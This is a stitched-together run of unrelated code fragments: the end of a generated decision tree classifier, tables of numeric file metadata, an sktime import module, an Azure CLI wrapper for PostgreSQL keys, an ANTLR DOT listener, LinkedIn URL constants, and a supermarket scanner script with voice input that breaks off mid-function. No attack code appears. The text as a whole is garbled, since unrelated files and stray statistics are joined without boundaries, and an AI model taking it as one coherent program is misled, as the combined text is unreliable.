# {"feature": "Occupation", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[7]<=16:
return 'True'
else: return 'True'
elif obj[4]<=1:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Age", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[4]<=1:
# {"feature": "Occupation", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[7]<=1:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[0]>2:
# {"feature": "Coffeehouse", "instances": 31, "metric_value": 0.2184, "depth": 7}
if obj[9]<=3.0:
# {"feature": "Occupation", "instances": 26, "metric_value": 0.1918, "depth": 8}
if obj[7]<=17:
# {"feature": "Age", "instances": 23, "metric_value": 0.083, "depth": 9}
if obj[4]<=5:
# {"feature": "Gender", "instances": 22, "metric_value": 0.0844, "depth": 10}
if obj[3]<=0:
# {"feature": "Children", "instances": 14, "metric_value": 0.131, "depth": 11}
if obj[5]<=0:
# {"feature": "Distance", "instances": 12, "metric_value": 0.15, "depth": 12}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.18, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[12]<=1:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[4]>5:
return 'False'
else: return 'False'
elif obj[7]>17:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 9}
if obj[3]>0:
# {"feature": "Age", "instances": 2, "metric_value": 0.5, "depth": 10}
if obj[4]<=3:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[11]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[9]>3.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Direction_same", "instances": 47, "metric_value": 0.3225, "depth": 6}
if obj[11]<=0:
# {"feature": "Age", "instances": 25, "metric_value": 0.4109, "depth": 7}
if obj[4]>1:
# {"feature": "Occupation", "instances": 14, "metric_value": 0.4167, "depth": 8}
if obj[7]>4:
# {"feature": "Coffeehouse", "instances": 12, "metric_value": 0.4381, "depth": 9}
if obj[9]>1.0:
# {"feature": "Children", "instances": 7, "metric_value": 0.3429, "depth": 10}
if obj[5]<=0:
# {"feature": "Passanger", "instances": 5, "metric_value": 0.4667, "depth": 11}
if obj[0]<=0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[3]>0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=2:
return 'False'
else: return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[0]>0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[9]<=1.0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[3]<=0:
# {"feature": "Passanger", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[0]>0:
# {"feature": "Children", "instances": 2, "metric_value": 0.0, "depth": 12}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[0]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[7]<=4:
return 'False'
else: return 'False'
elif obj[4]<=1:
# {"feature": "Coffeehouse", "instances": 11, "metric_value": 0.2525, "depth": 8}
if obj[9]>1.0:
# {"feature": "Passanger", "instances": 9, "metric_value": 0.1111, "depth": 9}
if obj[0]>0:
return 'True'
elif obj[0]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 10}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[9]<=1.0:
# {"feature": "Passanger", "instances": 2, "metric_value": 0.0, "depth": 9}
if obj[0]<=0:
return 'True'
elif obj[0]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Occupation", "instances": 22, "metric_value": 0.0909, "depth": 7}
if obj[7]<=16:
return 'True'
elif obj[7]>16:
# {"feature": "Age", "instances": 4, "metric_value": 0.3333, "depth": 8}
if obj[4]<=2:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 9}
if obj[3]<=0:
# {"feature": "Coffeehouse", "instances": 2, "metric_value": 0.0, "depth": 10}
if obj[9]>0.0:
return 'False'
elif obj[9]<=0.0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[4]>2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[6]<=1:
# {"feature": "Occupation", "instances": 118, "metric_value": 0.3338, "depth": 5}
if obj[7]>7:
# {"feature": "Time", "instances": 64, "metric_value": 0.2462, "depth": 6}
if obj[1]<=2:
# {"feature": "Coffeehouse", "instances": 38, "metric_value": 0.1373, "depth": 7}
if obj[9]<=2.0:
# {"feature": "Age", "instances": 23, "metric_value": 0.1581, "depth": 8}
if obj[4]<=6:
# {"feature": "Direction_same", "instances": 22, "metric_value": 0.1212, "depth": 9}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.3333, "depth": 10}
if obj[3]<=0:
# {"feature": "Passanger", "instances": 4, "metric_value": 0.5, "depth": 11}
if obj[0]<=1:
# {"feature": "Children", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=1:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=1:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>6:
return 'False'
else: return 'False'
elif obj[9]>2.0:
return 'True'
else: return 'True'
elif obj[1]>2:
# {"feature": "Passanger", "instances": 26, "metric_value": 0.3401, "depth": 7}
if obj[0]<=2:
# {"feature": "Direction_same", "instances": 19, "metric_value": 0.4145, "depth": 8}
if obj[11]<=0:
# {"feature": "Children", "instances": 16, "metric_value": 0.4219, "depth": 9}
if obj[5]>0:
# {"feature": "Coffeehouse", "instances": 8, "metric_value": 0.3571, "depth": 10}
if obj[9]>0.0:
# {"feature": "Distance", "instances": 7, "metric_value": 0.2381, "depth": 11}
if obj[12]<=2:
# {"feature": "Age", "instances": 6, "metric_value": 0.2222, "depth": 12}
if obj[4]>0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.0, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[4]<=0:
return 'False'
else: return 'False'
elif obj[12]>2:
return 'True'
else: return 'True'
elif obj[9]<=0.0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Age", "instances": 8, "metric_value": 0.3333, "depth": 10}
if obj[4]<=6:
# {"feature": "Coffeehouse", "instances": 6, "metric_value": 0.1667, "depth": 11}
if obj[9]>0.0:
return 'True'
elif obj[9]<=0.0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>6:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 11}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[0]>2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[7]<=7:
# {"feature": "Coffeehouse", "instances": 54, "metric_value": 0.3991, "depth": 6}
if obj[9]>0.0:
# {"feature": "Age", "instances": 49, "metric_value": 0.4281, "depth": 7}
if obj[4]<=4:
# {"feature": "Passanger", "instances": 41, "metric_value": 0.3847, "depth": 8}
if obj[0]<=2:
# {"feature": "Time", "instances": 35, "metric_value": 0.4288, "depth": 9}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 18, "metric_value": 0.4575, "depth": 10}
if obj[11]<=0:
# {"feature": "Distance", "instances": 17, "metric_value": 0.4759, "depth": 11}
if obj[12]<=2:
# {"feature": "Gender", "instances": 11, "metric_value": 0.3697, "depth": 12}
if obj[3]<=0:
# {"feature": "Children", "instances": 6, "metric_value": 0.2778, "depth": 13}
if obj[5]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Children", "instances": 5, "metric_value": 0.4667, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[12]>2:
# {"feature": "Gender", "instances": 6, "metric_value": 0.0, "depth": 12}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Distance", "instances": 17, "metric_value": 0.3252, "depth": 10}
if obj[12]<=1:
# {"feature": "Gender", "instances": 9, "metric_value": 0.1778, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 5, "metric_value": 0.3, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[11]<=1:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[12]>1:
# {"feature": "Children", "instances": 8, "metric_value": 0.3571, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 7, "metric_value": 0.4048, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[0]>2:
return 'True'
else: return 'True'
elif obj[4]>4:
# {"feature": "Passanger", "instances": 8, "metric_value": 0.3333, "depth": 8}
if obj[0]<=1:
# {"feature": "Time", "instances": 6, "metric_value": 0.2222, "depth": 9}
if obj[1]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[11]>0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=1:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[11]<=0:
return 'False'
else: return 'False'
elif obj[1]>1:
return 'True'
else: return 'True'
elif obj[0]>1:
return 'False'
else: return 'False'
else: return 'True'
elif obj[9]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
| 42.001066
| 262
| 0.462958
| 36,928
| 315,260
| 3.896637
| 0.024209
| 0.128962
| 0.140686
| 0.126203
| 0.971173
| 0.929838
| 0.92302
| 0.853365
| 0.79688
| 0.734487
| 0
| 0.103556
| 0.356725
| 315,260
| 7,505
| 263
| 42.006662
| 0.605989
| 0.417547
| 0
| 0.99175
| 0
| 0
| 0.071267
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000172
| false
| 0
| 0
| 0
| 0.21021
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
814d68783a98126a48a7084913eabb89c98ae4d1
| 170
|
py
|
Python
|
sktime/datasets/__init__.py
|
TonyBagnall/sktime
|
837a77026be3e53511c3d6139ddad14a39351bf5
|
[
"BSD-3-Clause"
] | 2
|
2019-08-19T13:59:21.000Z
|
2020-03-02T20:32:31.000Z
|
sktime/datasets/__init__.py
|
TonyBagnall/boss_fork
|
837a77026be3e53511c3d6139ddad14a39351bf5
|
[
"BSD-3-Clause"
] | null | null | null |
sktime/datasets/__init__.py
|
TonyBagnall/boss_fork
|
837a77026be3e53511c3d6139ddad14a39351bf5
|
[
"BSD-3-Clause"
] | 2
|
2019-08-24T12:06:15.000Z
|
2020-01-09T07:32:40.000Z
|
from .base import load_gunpoint
from .base import load_gunpoint_dataframe
from .base import load_italy_power_demand_dataframe
from .base import load_arrow_head_dataframe
| 34
| 51
| 0.882353
| 26
| 170
| 5.384615
| 0.423077
| 0.228571
| 0.4
| 0.514286
| 0.757143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094118
| 170
| 4
| 52
| 42.5
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
81cdc4a5bc02a6b2f28bbac4651c27cb31e77850
| 267
|
py
|
Python
|
simulator/scripts/sweep/sec_size_sweep.py
|
lab11/Task2
|
3c3451599dd303cd1e2469e5b9e36e1b4ca49fa6
|
[
"Apache-2.0"
] | 21
|
2018-08-29T18:58:26.000Z
|
2022-01-12T09:08:04.000Z
|
simulator/scripts/sweep/sec_size_sweep.py
|
lab11/permamote
|
3c3451599dd303cd1e2469e5b9e36e1b4ca49fa6
|
[
"Apache-2.0"
] | 9
|
2017-11-08T03:22:58.000Z
|
2020-05-02T18:23:12.000Z
|
simulator/scripts/sweep/sec_size_sweep.py
|
lab11/Task2
|
3c3451599dd303cd1e2469e5b9e36e1b4ca49fa6
|
[
"Apache-2.0"
] | 8
|
2018-10-28T23:44:23.000Z
|
2021-07-11T05:18:02.000Z
|
class sweep:
def __init__(self):
self.sweep_vars = [[('secondary', 'capacity_J'), [i*10**exp for exp in range(-3, 3) for i in [1, 5]], 'util']]
#class sweep:
# def __init__(self):
# self.sweep_vars = [[('secondary', 'capacity_J'), [1], 'util']]
| 38.142857
| 118
| 0.576779
| 39
| 267
| 3.641026
| 0.487179
| 0.140845
| 0.183099
| 0.239437
| 0.732394
| 0.732394
| 0.732394
| 0.732394
| 0.732394
| 0.732394
| 0
| 0.032864
| 0.202247
| 267
| 6
| 119
| 44.5
| 0.633803
| 0.393258
| 0
| 0
| 0
| 0
| 0.144654
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c49c3bb9c49eecb1eda74ddecae4cdade78a0a23
| 2,538
|
py
|
Python
|
pyaz/postgres/server/key/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/postgres/server/key/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | null | null | null |
pyaz/postgres/server/key/__init__.py
|
py-az-cli/py-az-cli
|
9a7dc44e360c096a5a2f15595353e9dad88a9792
|
[
"MIT"
] | 1
|
2022-02-03T09:12:01.000Z
|
2022-02-03T09:12:01.000Z
|
'''
Manage PostgreSQL server keys.
'''
from .... pyaz_utils import _call_az
def create(kid, name, resource_group):
'''
Create server key.
Required Parameters:
- kid -- The Azure Key Vault key identifier of the server key. An example key identifier is "https://YourVaultName.vault.azure.net/keys/YourKeyName/01234567890123456789012345678901"
- name -- Name of the server. The name can contain only lowercase letters, numbers, and the hyphen (-) character. Minimum 3 characters and maximum 63 characters.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
'''
return _call_az("az postgres server key create", locals())
def delete(kid, name, resource_group, yes=None):
'''
Delete server key.
Required Parameters:
- kid -- The Azure Key Vault key identifier of the server key. An example key identifier is "https://YourVaultName.vault.azure.net/keys/YourKeyName/01234567890123456789012345678901"
- name -- Name of the server. The name can contain only lowercase letters, numbers, and the hyphen (-) character. Minimum 3 characters and maximum 63 characters.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
Optional Parameters:
- yes -- Do not prompt for confirmation.
'''
return _call_az("az postgres server key delete", locals())
def show(kid, name, resource_group):
'''
Show server key.
Required Parameters:
- kid -- The Azure Key Vault key identifier of the server key. An example key identifier is "https://YourVaultName.vault.azure.net/keys/YourKeyName/01234567890123456789012345678901"
- name -- Name of the server. The name can contain only lowercase letters, numbers, and the hyphen (-) character. Minimum 3 characters and maximum 63 characters.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
'''
return _call_az("az postgres server key show", locals())
def list(name, resource_group):
'''
Required Parameters:
- name -- Name of the server. The name can contain only lowercase letters, numbers, and the hyphen (-) character. Minimum 3 characters and maximum 63 characters.
- resource_group -- Name of resource group. You can configure the default group using `az configure --defaults group=<name>`
'''
return _call_az("az postgres server key list", locals())
| 46.145455
| 185
| 0.723404
| 336
| 2,538
| 5.407738
| 0.193452
| 0.085856
| 0.042378
| 0.028619
| 0.839296
| 0.839296
| 0.839296
| 0.822234
| 0.822234
| 0.822234
| 0
| 0.0523
| 0.186367
| 2,538
| 54
| 186
| 47
| 0.827603
| 0.760047
| 0
| 0
| 0
| 0
| 0.238298
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0
| 0.111111
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
c4ea2b3280d909e2e67c0135ca2475df32ad58ba
| 4,100
|
py
|
Python
|
DOTListener.py
|
Makistos/dotcomb
|
aa90d8bcfd18b49942fccfd2d45eddab28f6e61a
|
[
"MIT"
] | null | null | null |
DOTListener.py
|
Makistos/dotcomb
|
aa90d8bcfd18b49942fccfd2d45eddab28f6e61a
|
[
"MIT"
] | null | null | null |
DOTListener.py
|
Makistos/dotcomb
|
aa90d8bcfd18b49942fccfd2d45eddab28f6e61a
|
[
"MIT"
] | null | null | null |
# Generated from DOT.g4 by ANTLR 4.7.1
from antlr4 import *
if __name__ is not None and "." in __name__:
from .DOTParser import DOTParser
else:
from DOTParser import DOTParser
# This class defines a complete listener for a parse tree produced by DOTParser.
class DOTListener(ParseTreeListener):
# Enter a parse tree produced by DOTParser#graph.
def enterGraph(self, ctx:DOTParser.GraphContext):
pass
# Exit a parse tree produced by DOTParser#graph.
def exitGraph(self, ctx:DOTParser.GraphContext):
pass
# Enter a parse tree produced by DOTParser#stmt_list.
def enterStmt_list(self, ctx:DOTParser.Stmt_listContext):
pass
# Exit a parse tree produced by DOTParser#stmt_list.
def exitStmt_list(self, ctx:DOTParser.Stmt_listContext):
pass
# Enter a parse tree produced by DOTParser#stmt.
def enterStmt(self, ctx:DOTParser.StmtContext):
pass
# Exit a parse tree produced by DOTParser#stmt.
def exitStmt(self, ctx:DOTParser.StmtContext):
pass
# Enter a parse tree produced by DOTParser#attr_stmt.
def enterAttr_stmt(self, ctx:DOTParser.Attr_stmtContext):
pass
# Exit a parse tree produced by DOTParser#attr_stmt.
def exitAttr_stmt(self, ctx:DOTParser.Attr_stmtContext):
pass
# Enter a parse tree produced by DOTParser#attr_list.
def enterAttr_list(self, ctx:DOTParser.Attr_listContext):
pass
# Exit a parse tree produced by DOTParser#attr_list.
def exitAttr_list(self, ctx:DOTParser.Attr_listContext):
pass
# Enter a parse tree produced by DOTParser#a_list.
def enterA_list(self, ctx:DOTParser.A_listContext):
pass
# Exit a parse tree produced by DOTParser#a_list.
def exitA_list(self, ctx:DOTParser.A_listContext):
pass
# Enter a parse tree produced by DOTParser#edge_stmt.
def enterEdge_stmt(self, ctx:DOTParser.Edge_stmtContext):
pass
# Exit a parse tree produced by DOTParser#edge_stmt.
def exitEdge_stmt(self, ctx:DOTParser.Edge_stmtContext):
pass
# Enter a parse tree produced by DOTParser#edgeRHS.
def enterEdgeRHS(self, ctx:DOTParser.EdgeRHSContext):
pass
# Exit a parse tree produced by DOTParser#edgeRHS.
def exitEdgeRHS(self, ctx:DOTParser.EdgeRHSContext):
pass
# Enter a parse tree produced by DOTParser#edgeop.
def enterEdgeop(self, ctx:DOTParser.EdgeopContext):
pass
# Exit a parse tree produced by DOTParser#edgeop.
def exitEdgeop(self, ctx:DOTParser.EdgeopContext):
pass
# Enter a parse tree produced by DOTParser#node_stmt.
def enterNode_stmt(self, ctx:DOTParser.Node_stmtContext):
pass
# Exit a parse tree produced by DOTParser#node_stmt.
def exitNode_stmt(self, ctx:DOTParser.Node_stmtContext):
pass
# Enter a parse tree produced by DOTParser#node_id.
def enterNode_id(self, ctx:DOTParser.Node_idContext):
pass
# Exit a parse tree produced by DOTParser#node_id.
def exitNode_id(self, ctx:DOTParser.Node_idContext):
pass
# Enter a parse tree produced by DOTParser#port.
def enterPort(self, ctx:DOTParser.PortContext):
pass
# Exit a parse tree produced by DOTParser#port.
def exitPort(self, ctx:DOTParser.PortContext):
pass
# Enter a parse tree produced by DOTParser#subgraph.
def enterSubgraph(self, ctx:DOTParser.SubgraphContext):
pass
# Exit a parse tree produced by DOTParser#subgraph.
def exitSubgraph(self, ctx:DOTParser.SubgraphContext):
pass
# Enter a parse tree produced by DOTParser#r_id.
def enterR_id(self, ctx:DOTParser.R_idContext):
pass
# Exit a parse tree produced by DOTParser#r_id.
def exitR_id(self, ctx:DOTParser.R_idContext):
pass
# Enter a parse tree produced by DOTParser#v_id.
def enterV_id(self, ctx:DOTParser.V_idContext):
pass
# Exit a parse tree produced by DOTParser#v_id.
def exitV_id(self, ctx:DOTParser.V_idContext):
pass
| 28.082192
| 80
| 0.700976
| 549
| 4,100
| 5.12204
| 0.151184
| 0.066145
| 0.110242
| 0.198435
| 0.838549
| 0.72404
| 0.713727
| 0.564367
| 0.423898
| 0.037696
| 0
| 0.001582
| 0.229268
| 4,100
| 145
| 81
| 28.275862
| 0.888291
| 0.380488
| 0
| 0.454545
| 1
| 0
| 0.000404
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.454545
| false
| 0.454545
| 0.045455
| 0
| 0.515152
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
480a482bbcd521000a3f7930ffb20e8da8813657
| 138
|
py
|
Python
|
linkedin_jobs_scraper/utils/constants.py
|
magahet/py-linkedin-jobs-scraper
|
f0d69053455e68bd8a74ab2d79ab2c27b5e3f7d4
|
[
"MIT"
] | 85
|
2020-10-21T04:09:23.000Z
|
2022-03-23T00:29:33.000Z
|
linkedin_jobs_scraper/utils/constants.py
|
magahet/py-linkedin-jobs-scraper
|
f0d69053455e68bd8a74ab2d79ab2c27b5e3f7d4
|
[
"MIT"
] | 24
|
2020-11-18T10:10:32.000Z
|
2022-03-19T17:30:25.000Z
|
linkedin_jobs_scraper/utils/constants.py
|
magahet/py-linkedin-jobs-scraper
|
f0d69053455e68bd8a74ab2d79ab2c27b5e3f7d4
|
[
"MIT"
] | 23
|
2020-11-18T09:31:13.000Z
|
2022-03-25T03:50:52.000Z
|
HOME_URL = 'https://www.linkedin.com'
JOBS_URL = 'https://www.linkedin.com/jobs'
JOBS_SEARCH_URL = 'https://www.linkedin.com/jobs/search'
| 34.5
| 56
| 0.73913
| 22
| 138
| 4.454545
| 0.363636
| 0.244898
| 0.336735
| 0.581633
| 0.795918
| 0.795918
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 138
| 3
| 57
| 46
| 0.75969
| 0
| 0
| 0
| 0
| 0
| 0.644928
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fe4b8814f8055cb48856868fba0b87c900e6a59
| 48,870
|
py
|
Python
|
src/interface.py
|
sugaarrrr/intelligent-supermarket-system
|
e8e570f53cc2df4da3f68b2de185bb5ed521b843
|
[
"MIT"
] | null | null | null |
src/interface.py
|
sugaarrrr/intelligent-supermarket-system
|
e8e570f53cc2df4da3f68b2de185bb5ed521b843
|
[
"MIT"
] | 1
|
2021-10-12T05:47:50.000Z
|
2021-10-12T05:47:50.000Z
|
src/interface.py
|
sugaarrrr/intelligent-supermarket-system
|
e8e570f53cc2df4da3f68b2de185bb5ed521b843
|
[
"MIT"
] | null | null | null |
#import libraries
from datetime import datetime
import time
import tkinter as tk
import tkinter.scrolledtext as scrtxt
from tkinter import *
import tkinter.font as font
from PIL import Image, ImageTk
from tkinter import ttk
import speech_recognition as sr
from gtts import gTTS
from imutils.video.pivideostream import PiVideoStream
from imutils.video import FPS
import imutils
import time
import cv2
font_name = "Gentium"
classNames = {0: 'background',
1: 'person', 2: 'bicycle', 3: 'car', 4: 'motorcycle', 5: 'airplane', 6: 'bus',
7: 'train', 8: 'truck', 9: 'boat', 10: 'traffic light', 11: 'fire hydrant',
13: 'stop sign', 14: 'parking meter', 15: 'bench', 16: 'bird', 17: 'cat',
18: 'dog', 19: 'horse', 20: 'sheep', 21: 'cow', 22: 'elephant', 23: 'bear',
24: 'zebra', 25: 'giraffe', 27: 'backpack', 28: 'umbrella', 31: 'handbag',
32: 'tie', 33: 'suitcase', 34: 'frisbee', 35: 'skis', 36: 'snowboard',
37: 'sports ball', 38: 'kite', 39: 'baseball bat', 40: 'baseball glove',
41: 'skateboard', 42: 'surfboard', 43: 'tennis racket', 44: 'bottle',
46: 'wine glass', 47: 'cup', 48: 'fork', 49: 'knife', 50: 'spoon',
51: 'bowl', 52: 'banana', 53: 'apple', 54: 'sandwich', 55: 'orange',
56: 'broccoli', 57: 'carrot', 58: 'hot dog', 59: 'pizza', 60: 'donut',
61: 'cake', 62: 'chair', 63: 'couch', 64: 'potted plant', 65: 'bed',
67: 'dining table', 70: 'toilet', 72: 'tv', 73: 'laptop', 74: 'mouse',
75: 'remote', 76: 'keyboard', 77: 'cell phone', 78: 'microwave', 79: 'oven',
80: 'toaster', 81: 'sink', 82: 'refrigerator', 84: 'book', 85: 'clock',
86: 'vase', 87: 'scissors', 88: 'teddy bear', 89: 'hair drier', 90: 'toothbrush'}
#classNames = {0:'banana', 1:'apple', 2:'orange', '3': 'scissors', 4:'background'}
desired = ['background','banana','apple','scissors','book', 'remote', 'hair drier','bottle']
def id_class_name(class_id, classes):
for key, value in classes.items():
if class_id == key:
return value
model = cv2.dnn.readNetFromTensorflow('models/frozen_inference_graph.pb','models/ssd_mobilenet_v2_coco_2018_03_29.pbtxt')
#----------------Scanner-------------------------
class Scanner():
def __init__(self, cust):
self.customer = cust
self.grocery_list = []
def add_item(self, item_name, price, quantity):
if self.item_exists(item_name) == True:
for entry in self.grocery_list:
if entry['item'] == item_name:
entry['quantity'] += quantity
else:
entry = {'item':item_name, 'price':price, 'quantity':quantity}
self.grocery_list.append(entry)
#print(self.grocery_list)
def item_exists(self, item_name): #check if the item is available in the list
available = False
for entry in self.grocery_list:
if entry['item'] == item_name:
available = True
return available
def delete_item(self, item_name):
for entry in self.grocery_list:
if entry['item'] == item_name:
self.grocery_list.remove(entry)
#print(self.grocery_list)
def receipt(self):
return self.grocery_list
#---------------Voice command------------------
def voice_input():
# return "Bakery"
r = sr.Recognizer()
with sr.Microphone() as source:
r.adjust_for_ambient_noise(source, duration=1)
audio = r.listen(source)
try:
text = r.recognize_google(audio)
if text.lower() == "bakery":
return "bakery"
elif text.lower() == "dairy":
return "dairy"
elif text.lower() == "deli":
return "deli"
elif text.lower() == "dry goods":
return "dry goods"
